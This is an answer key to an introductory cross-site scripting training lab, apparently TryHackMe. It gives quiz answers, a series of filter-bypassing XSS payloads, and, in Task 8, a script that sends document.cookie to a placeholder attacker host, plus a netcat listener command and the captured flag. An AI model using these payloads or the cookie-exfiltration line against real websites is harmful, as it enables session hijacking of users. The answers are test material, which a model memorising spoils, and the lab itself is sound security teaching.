Intro to Cross-site Scripting
Task 1 - Room Brief
Q1. What does XSS stand for?
Answer - Cross-Site Scripting
Task 2 - XSS Payloads
Q1. Which document property could contain the user's session token?
Answer - document.cookie
Q2. Which JavaScript method is often used as a Proof Of Concept?
Answer - alert
Task 3 - Reflected XSS
Q1. Where in an URL is a good place to test for reflected XSS?
Answer - parameters
Task 4 - Stored XSS
Q1. How are stored XSS payloads usually stored on a website?
Answer - database
Task 5 - DOM Based XSS
Q1. What unsafe JavaScript method is good to look for in source code?
Answer - eval()
Task 6 - Blind XSS
Q1. What tool can you use to test for Blind XSS?
Answer - XSS Hunter Express
Q2. What type of XSS is very similar to Blind XSS?
Answer - Stored XSS
Task 7 - Perfecting your payload
Q1. What is the flag you received from level six?
STEP 1 - <script>alert('THM')</script>
STEP 2 - a"><script>alert('THM')</script>
STEP 3 - </textarea><script>alert('THM')</script>
STEP 4 - ';alert('THM') //
STEP 5 - <sscriptcript>alert('THM')</sscriptcript>
STEP 6 - x" onerror="alert('THM')"
Task 8 - Practical Example (Blind XSS)
Q1. What is the value of the staff-session cookie?
</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>
(change ip.port with your attackbox ip/port opened by nc -lvnp 3210 command)
Answer - 4AB305E55955197693F01D6F8FD2D321